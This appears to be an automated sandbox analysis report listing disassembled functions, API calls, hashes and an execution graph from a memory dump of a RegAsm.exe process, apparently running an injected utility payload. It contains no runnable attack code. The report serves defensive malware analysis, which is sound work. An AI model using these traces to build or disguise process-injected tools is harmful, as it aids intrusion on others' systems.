                                                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                • API String ID: 4271163124-1506664499
                                                                                                                                                                                • Opcode ID: d2abe1e6ce67af05a23a9289f1a003983cf5919859a34de4ac3658ffea157a86
                                                                                                                                                                                • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                                                                                                • Opcode Fuzzy Hash: d2abe1e6ce67af05a23a9289f1a003983cf5919859a34de4ac3658ffea157a86
                                                                                                                                                                                • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                                                                                                Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??3@DeleteObject
                                                                                                                                                                                • String ID: r!A
                                                                                                                                                                                • API String ID: 1103273653-628097481
                                                                                                                                                                                • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                                                                • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                                                                Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                                                                                                • wcscat.MSVCRT ref: 0040DCFF
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                                                • String ID: _lng.ini
                                                                                                                                                                                • API String ID: 383090722-1948609170
                                                                                                                                                                                • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                                                                                • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                                                                                                • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                                                                                • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                                                                                                Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                                                                                                • memset.MSVCRT ref: 0042BAAE
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 438689982-0
                                                                                                                                                                                • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                                                • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                                                                                                • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                                                • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                                                                                                Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@$memset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1860491036-0
                                                                                                                                                                                • Opcode ID: 132c9519558d853c1af1b7fa7761ae76911dbcbc7ff65e94ed4645376a2186b4
                                                                                                                                                                                • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                                                                                                • Opcode Fuzzy Hash: 132c9519558d853c1af1b7fa7761ae76911dbcbc7ff65e94ed4645376a2186b4
                                                                                                                                                                                • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                                                                                                Function 0040A8D0 Relevance: 5.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                • free.MSVCRT ref: 0040A908
                                                                                                                                                                                • free.MSVCRT ref: 0040A92B
                                                                                                                                                                                • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 726966127-0
                                                                                                                                                                                • Opcode ID: 4562b1f94f0a461de08a7f5e91ae4aaaeb7b7426ec7425c8aec4e78307d57c52
                                                                                                                                                                                • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                                                                                                • Opcode Fuzzy Hash: 4562b1f94f0a461de08a7f5e91ae4aaaeb7b7426ec7425c8aec4e78307d57c52
                                                                                                                                                                                • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                                                                                                Function 0040B1D1 Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                                                                • free.MSVCRT ref: 0040B201
                                                                                                                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                • free.MSVCRT ref: 0040B224
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 726966127-0
                                                                                                                                                                                • Opcode ID: 6ce6fee0dcc9b9c9ebe83d30a233e08065b6d511c8ed6dc8d89b241ff4cd5fb7
                                                                                                                                                                                • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                                                                                • Opcode Fuzzy Hash: 6ce6fee0dcc9b9c9ebe83d30a233e08065b6d511c8ed6dc8d89b241ff4cd5fb7
                                                                                                                                                                                • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                                                                                Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memcmp.MSVCRT ref: 00408AF3
                                                                                                                                                                                  • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                                                                                                                                                  • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                                                                                                                  • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                                                                                                                • memcmp.MSVCRT ref: 00408B2B
                                                                                                                                                                                • memcmp.MSVCRT ref: 00408B5C
                                                                                                                                                                                • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcmp$memcpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 231171946-0
                                                                                                                                                                                • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                                                                                                • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                                                                                                Function 0040B0D1 Relevance: 5.1, APIs: 4, Instructions: 55stringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                                                • free.MSVCRT ref: 0040B0FB
                                                                                                                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                • free.MSVCRT ref: 0040B12C
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$memcpy$mallocstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3669619086-0
                                                                                                                                                                                • Opcode ID: 1032aca3c4d565b21c9c93c1da03fa01242ca6c05261a3900927d5bb2d17b358
                                                                                                                                                                                • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                                                                                • Opcode Fuzzy Hash: 1032aca3c4d565b21c9c93c1da03fa01242ca6c05261a3900927d5bb2d17b358
                                                                                                                                                                                • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                                                                                Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1033339047-0
                                                                                                                                                                                • Opcode ID: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                                                                                                                                                                                • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                                                • Opcode Fuzzy Hash: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                                                                                                                                                                                • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                                                Function 004173E4 Relevance: 5.0, APIs: 4, Instructions: 41COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                                                                • malloc.MSVCRT ref: 00417407
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                                                                • free.MSVCRT ref: 00417425
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2605342592-0
                                                                                                                                                                                • Opcode ID: 3df1ff1ad5f7619570b5295ff2d6745c95529d6511ab958c6202ec18d606cc9c
                                                                                                                                                                                • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                                                                                • Opcode Fuzzy Hash: 3df1ff1ad5f7619570b5295ff2d6745c95529d6511ab958c6202ec18d606cc9c
                                                                                                                                                                                • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                                                                                                Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wcslen$wcscat$wcscpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1961120804-0
                                                                                                                                                                                • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                                                • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                                                                                                • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                                                • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:3%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:21.8%
                                                                                                                                                                                Signature Coverage:0.4%
                                                                                                                                                                                Total number of Nodes:925
                                                                                                                                                                                Total number of Limit Nodes:15
                                                                                                                                                                                execution_graph 34241 40fc40 60 API calls 34416 403640 21 API calls 34242 427fa4 42 API calls 34417 412e43 _endthreadex 34418 425115 76 API calls __fprintf_l 34419 43fe40 133 API calls 34245 425115 83 API calls __fprintf_l 34246 401445 memcpy memcpy DialogBoxParamA 34247 440c40 34 API calls 33271 444c4a 33290 444e38 33271->33290 33273 444c56 GetModuleHandleA 33276 444c68 __set_app_type __p__fmode __p__commode 33273->33276 33275 444cfa 33277 444d02 __setusermatherr 33275->33277 33278 444d0e 33275->33278 33276->33275 33277->33278 33291 444e22 _controlfp 33278->33291 33280 444d13 _initterm __getmainargs _initterm 33281 444d6a GetStartupInfoA 33280->33281 33283 444d9e GetModuleHandleA 33281->33283 33292 40cf44 33283->33292 33287 444dcf _cexit 33289 444e04 33287->33289 33288 444dc8 exit 33288->33287 33290->33273 33291->33280 33343 404a99 LoadLibraryA 33292->33343 33294 40cf60 33295 40cf64 33294->33295 33349 410d0e 33294->33349 33295->33287 33295->33288 33297 40cf6f 33353 40ccd7 ??2@YAPAXI 33297->33353 33299 40cf9b 33367 407cbc 33299->33367 33304 40cfc4 33385 409825 memset 33304->33385 33305 40cfd8 33390 4096f4 memset 33305->33390 33310 40d181 ??3@YAXPAX 33312 40d1b3 33310->33312 33313 40d19f DeleteObject 33310->33313 33311 407e30 _strcmpi 33314 40cfee 33311->33314 33414 407948 free free 33312->33414 33313->33312 33316 40cff2 RegDeleteKeyA 33314->33316 33317 40d007 EnumResourceTypesA 33314->33317 33316->33310 33319 40d047 33317->33319 33320 40d02f MessageBoxA 33317->33320 33318 40d1c4 33415 4080d4 free 33318->33415 33321 40d0a0 CoInitialize 33319->33321 33395 40ce70 33319->33395 33320->33310 33412 40cc26 strncat memset RegisterClassA CreateWindowExA 33321->33412 33325 40d1cd 33416 407948 free free 33325->33416 33327 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33413 40c256 PostMessageA 33327->33413 33329 40d061 ??3@YAXPAX 33329->33312 33332 40d084 DeleteObject 33329->33332 33330 40d09e 33330->33321 33332->33312 33335 40d0f9 GetMessageA 33336 40d17b CoUninitialize 33335->33336 33338 40d10d 33335->33338 33336->33310 33337 40d113 TranslateAccelerator 33337->33338 33339 40d16d GetMessageA 33337->33339 33338->33337 33340 40d145 IsDialogMessage 33338->33340 33341 40d139 IsDialogMessage 33338->33341 33339->33336 33339->33337 33340->33339 33342 40d157 TranslateMessage DispatchMessageA 33340->33342 33341->33339 33341->33340 33342->33339 33344 404ae8 33343->33344 33348 404ac4 FreeLibrary 33343->33348 33346 404b13 33344->33346 33347 404afc MessageBoxA 33344->33347 33346->33294 33347->33294 33348->33344 33350 410d17 LoadLibraryA 33349->33350 33351 410d3c 33349->33351 33350->33351 33352 410d2b 33350->33352 33351->33297 33352->33351 33354 40cd08 ??2@YAPAXI 33353->33354 33356 40cd26 33354->33356 33357 40cd2d 33354->33357 33424 404025 6 API calls 33356->33424 33359 40cd66 33357->33359 33360 40cd59 DeleteObject 33357->33360 33417 407088 33359->33417 33360->33359 33362 40cd6b 33420 4019b5 33362->33420 33365 4019b5 strncat 33366 40cdbf _mbscpy 33365->33366 33366->33299 33426 407948 free free 33367->33426 33370 407cf7 33372 407a1f malloc memcpy free free 33370->33372 33373 407ddc 33370->33373 33375 407d7a free 33370->33375 33380 407e04 33370->33380 33427 40796e strlen 33370->33427 33440 406f30 33370->33440 33372->33370 33373->33380 33448 407a1f 33373->33448 33375->33370 33379 40796e 7 API calls 33379->33380 33437 407a55 33380->33437 33381 407e30 33382 407e38 33381->33382 33384 407e57 33381->33384 33383 407e41 _strcmpi 33382->33383 33382->33384 33383->33382 33383->33384 33384->33304 33384->33305 33453 4097ff 33385->33453 33387 409854 33458 409731 33387->33458 33391 4097ff 3 API calls 33390->33391 33392 409723 33391->33392 33478 40966c GetFileAttributesA GetPrivateProfileStringA _mbscpy _mbscpy GetPrivateProfileIntA 33392->33478 33394 40972b 33394->33311 33479 4023b2 33395->33479 33400 40ced3 33569 40cdda 7 API calls 33400->33569 33401 40cece 33405 40cf3f 33401->33405 33520 40c3d0 memset GetModuleFileNameA strrchr 33401->33520 33405->33329 33405->33330 33408 40ceed 33548 40affa 33408->33548 33412->33327 33413->33335 33414->33318 33415->33325 33416->33295 33425 406fc7 memset _mbscpy 33417->33425 33419 40709f CreateFontIndirectA 33419->33362 33421 4019e1 33420->33421 33422 4019c2 strncat 33421->33422 33423 4019e5 memset LoadIconA 33421->33423 33422->33421 33423->33365 33424->33357 33425->33419 33426->33370 33428 4079a1 33427->33428 33429 407998 free 33427->33429 33431 406f30 3 API calls 33428->33431 33430 4079ab 33429->33430 33432 4079c4 33430->33432 33433 4079bb free 33430->33433 33431->33430 33435 406f30 3 API calls 33432->33435 33434 4079d0 memcpy 33433->33434 33434->33370 33436 4079cf 33435->33436 33436->33434 33438 407a65 33437->33438 33439 407a5b free 33437->33439 33438->33381 33439->33438 33441 406f37 malloc 33440->33441 33442 406f7d 33440->33442 33444 406f73 33441->33444 33445 406f58 33441->33445 33442->33370 33444->33370 33446 406f6c free 33445->33446 33447 406f5c memcpy 33445->33447 33446->33444 33447->33446 33449 407a38 33448->33449 33450 407a2d free 33448->33450 33451 406f30 3 API calls 33449->33451 33452 407a43 33450->33452 33451->33452 33452->33379 33469 406f96 GetModuleFileNameA 33453->33469 33455 409805 strrchr 33456 409814 33455->33456 33457 409817 _mbscat 33455->33457 33456->33457 33457->33387 33470 44b090 33458->33470 33460 40973e _mbscpy _mbscpy 33472 40930c 33460->33472 33463 40930c 3 API calls 33464 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33463->33464 33465 4097c5 LoadStringA 33464->33465 33466 4097db 33465->33466 33466->33465 33468 4097f3 33466->33468 33477 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33466->33477 33468->33310 33469->33455 33471 44b097 33470->33471 33471->33460 33471->33471 33473 44b090 33472->33473 33474 409319 memset GetPrivateProfileStringA 33473->33474 33475 409374 33474->33475 33476 409364 WritePrivateProfileStringA 33474->33476 33475->33463 33476->33475 33477->33466 33478->33394 33571 409c1c 33479->33571 33482 401e69 memset 33610 410dbb 33482->33610 33485 401ec2 33641 4070e3 strlen _mbscat _mbscpy _mbscat 33485->33641 33486 401ed4 33626 406f81 GetFileAttributesA 33486->33626 33489 401ee6 strlen strlen 33491 401f15 33489->33491 33492 401f28 33489->33492 33642 4070e3 strlen _mbscat _mbscpy _mbscat 33491->33642 33627 406f81 GetFileAttributesA 33492->33627 33495 401f35 33628 401c31 33495->33628 33498 401f75 33640 410a9c RegOpenKeyExA 33498->33640 33499 401c31 7 API calls 33499->33498 33501 401f91 33502 402187 33501->33502 33503 401f9c memset 33501->33503 33505 402195 ExpandEnvironmentStringsA 33502->33505 33506 4021a8 _strcmpi 33502->33506 33643 410b62 RegEnumKeyExA 33503->33643 33652 406f81 GetFileAttributesA 33505->33652 33506->33400 33506->33401 33508 40217e RegCloseKey 33508->33502 33509 401fd9 atoi 33510 401fef memset memset sprintf 33509->33510 33513 401fc9 33509->33513 33644 410b1e 33510->33644 33513->33508 33513->33509 33514 402165 33513->33514 33515 402076 memset memset strlen strlen 33513->33515 33516 4070e3 strlen _mbscat _mbscpy _mbscat 33513->33516 33517 4020dd strlen strlen 33513->33517 33518 406f81 GetFileAttributesA 33513->33518 33519 402167 _mbscpy 33513->33519 33651 410b62 RegEnumKeyExA 33513->33651 33514->33508 33515->33513 33516->33513 33517->33513 33518->33513 33519->33508 33521 40c422 33520->33521 33522 40c425 _mbscat _mbscpy _mbscpy 33520->33522 33521->33522 33523 40c49d 33522->33523 33524 40c502 GetWindowPlacement 33523->33524 33525 40c512 33523->33525 33524->33525 33526 40c538 33525->33526 33673 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33525->33673 33666 409b31 33526->33666 33530 40ba28 33531 40ba87 33530->33531 33537 40ba3c 33530->33537 33676 406c62 LoadCursorA SetCursor 33531->33676 33533 40ba43 _mbsicmp 33533->33537 33534 40ba8c 33677 410a9c RegOpenKeyExA 33534->33677 33678 4107f1 33534->33678 33681 410808 33534->33681 33685 404734 33534->33685 33691 404785 33534->33691 33694 403c16 33534->33694 33535 40baa0 33536 407e30 _strcmpi 33535->33536 33540 40bab0 33536->33540 33537->33531 33537->33533 33767 40b5e5 10 API calls 33537->33767 33538 40bafa SetCursor 33538->33408 33540->33538 33541 40baf1 qsort 33540->33541 33541->33538 34225 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33548->34225 33550 40b00e 33551 40b016 33550->33551 33552 40b01f GetStdHandle 33550->33552 34226 406d1a CreateFileA 33551->34226 33554 40b01c 33552->33554 33555 40b035 33554->33555 33556 40b12d 33554->33556 34227 406c62 LoadCursorA SetCursor 33555->34227 34231 406d77 9 API calls 33556->34231 33559 40b136 33570 40c580 18 API calls 33559->33570 33560 40b087 33567 40b0a1 33560->33567 34229 40a699 12 API calls 33560->34229 33561 40b042 33561->33560 33561->33567 34228 40a57c strlen WriteFile 33561->34228 33564 40b0d6 33565 40b116 CloseHandle 33564->33565 33566 40b11f SetCursor 33564->33566 33565->33566 33566->33559 33567->33564 34230 406d77 9 API calls 33567->34230 33569->33401 33570->33405 33583 409a32 33571->33583 33574 409c80 memcpy memcpy 33577 409cda 33574->33577 33575 409d18 ??2@YAPAXI ??2@YAPAXI 33578 409d54 ??2@YAPAXI 33575->33578 33580 409d8b 33575->33580 33576 408db6 12 API calls 33576->33577 33577->33574 33577->33575 33577->33576 33578->33580 33580->33580 33593 409b9c 33580->33593 33582 4023c1 33582->33482 33584 409a44 33583->33584 33585 409a3d ??3@YAXPAX 33583->33585 33586 409a52 33584->33586 33587 409a4b ??3@YAXPAX 33584->33587 33585->33584 33588 409a63 33586->33588 33589 409a5c ??3@YAXPAX 33586->33589 33587->33586 33590 409a83 ??2@YAPAXI ??2@YAPAXI 33588->33590 33591 409a73 ??3@YAXPAX 33588->33591 33592 409a7c ??3@YAXPAX 33588->33592 33589->33588 33590->33574 33591->33592 33592->33590 33594 407a55 free 33593->33594 33595 409ba5 33594->33595 33596 407a55 free 33595->33596 33597 409bad 33596->33597 33598 407a55 free 33597->33598 33599 409bb5 33598->33599 33600 407a55 free 33599->33600 33601 409bbd 33600->33601 33602 407a1f 4 API calls 33601->33602 33603 409bd0 33602->33603 33604 407a1f 4 API calls 33603->33604 33605 409bda 33604->33605 33606 407a1f 4 API calls 33605->33606 33607 409be4 33606->33607 